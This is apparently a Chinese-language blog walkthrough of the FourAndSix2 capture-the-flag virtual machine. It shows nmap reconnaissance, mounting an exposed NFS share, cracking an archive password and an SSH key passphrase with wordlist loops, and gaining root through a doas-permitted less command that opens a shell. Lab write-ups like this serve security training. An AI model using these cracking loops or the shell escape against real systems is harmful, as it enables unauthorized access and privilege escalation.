Fork me on GitHub

靶机渗透

Posted on | Post modified: | In
Words count in article: 1k | Reading time ≈ 5

fourandsix2靶机

一开机就可以看到IP地址位192.168.41.132

然后nmap开始扫描
nmap -A -n -v -Pn -A 192.168.41.132
-A Enable OS detection, version detection, script scanning, and traceroute
-n -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
-Pn Treat all hosts as online — skip host discovery

扫描的报告:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Nmap scan report for 192.168.41.132
Host is up (0.00059s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 ef:3b:2e:cf:40:19:9e:bb:23:1e:aa:24:a1:09:4e:d1 (RSA)
|   256 c8:5c:8b:0b:e1:64:0c:75:c3:63:d7:b3:80:c9:2f:d2 (ECDSA)
|_  256 61:bc:45:9a:ba:a5:47:20:60:13:25:19:b0:47:cb:ad (ED25519)
111/tcp  open  rpcbind 2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3         2049/tcp  nfs
|   100003  2,3         2049/udp  nfs
|   100005  1,3          780/udp  mountd
|_  100005  1,3          917/tcp  mountd
2049/tcp open  nfs     2-3 (RPC #100003)
MAC Address: 00:0C:29:81:23:53 (VMware)
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.1
Uptime guess: 0.000 days (since Sat Jul 20 02:04:15 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Randomized

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 192.168.41.132

难得一次nmap可以扫出这么多信息
看到靶机开放了2049号端口,是nfs服务,那么尝试扫描可以挂载的目录

  • -sV : Probe open ports to determine service/version info

nmap -sV --script=nfs-showmount 192.168.41.132
扫描可以挂载的目录

结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9 (protocol 2.0)
111/tcp  open  rpcbind 2 (RPC #100000)
| nfs-showmount:
|_  /home/user/storage
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3         2049/tcp  nfs
|   100003  2,3         2049/udp  nfs
|   100005  1,3          780/udp  mountd
|_  100005  1,3          917/tcp  mountd
2049/tcp open  nfs     2-3 (RPC #100003)
MAC Address: 00:0C:29:81:23:53 (VMware)

很好,那就可以挂载目录了

1
2
root@kali:~# nfspysh -o server=192.168.41.132:/home/user/storage /tmp/test/
nfspy@192.168.41.132:/home/user/storage:/>

nfspysh的用法:

1
2
3
4
5
6
7
8
root@kali:~# nfspysh -h
Usage: nfspysh [options]

Options:
  -h, --help  show this help message and exit
  -l          List mount options available
  -o OPTIONS  Mount options as in nfspy
  -c COMMAND  Semicolon-separated commands to run (batch mode)

目录下有一个压缩包
get backup.7z
然后尝试用7z去解压缩,但是有密码

于是用john去破解

然而爆破有点慢

不过密码就是chocolate

ps.kali里面其实有很多字典的,比如/usr/share/john/password.lst

解压缩之后得到的是一个公钥和私钥

通过下面这段脚本爆破出密码是12345678

1
2
root@kali:/tmp# cat /usr/share/john/password.lst | while read pass; do if ssh-keygen -c -C "user@192.168.41.132" -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; done
12345678

然后就可以登陆了
ssh -i id_rsa user@192.168.41.132

之前一直尝试没登陆成功,因为我忘记赋权了
也就是
chmod 600 id_rsa

然后就可以登陆了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:/tmp# ssh -i id_rsa user@192.168.41.132
Enter passphrase for key 'id_rsa':
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

fourandsix2$

如下是错误的做法:

1
2
3
4
5
6
7
root@kali:/tmp# ssh -i id_rsa user@192.168.41.132
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0777 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.

登陆之后

没办法直接访问root文件夹

1
2
fourandsix2$ ls /root/
ls: /root/: Permission denied

接下来这波操作很不明白

输入
doas /usr/bin/less /var/log/authlog
然后按v进入编辑模式
之后输入:!/bin/sh

four

于是就提权了

1
2
fourandsix2# whoami
root

成功了

1
2
3
4
5
6
7
8
9
10
11
fourandsix2# cat /root/flag.txt                                                                                                                                             
Nice you hacked all the passwords!

Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done

cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done


Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42

补充提权的过程:
/etc/doas.conf文件中有这些内容
所以可以用doas命令查看authlod文件
同时,通过编辑它,进入了shell

doas

参考

FourAndSix2.01靶机渗透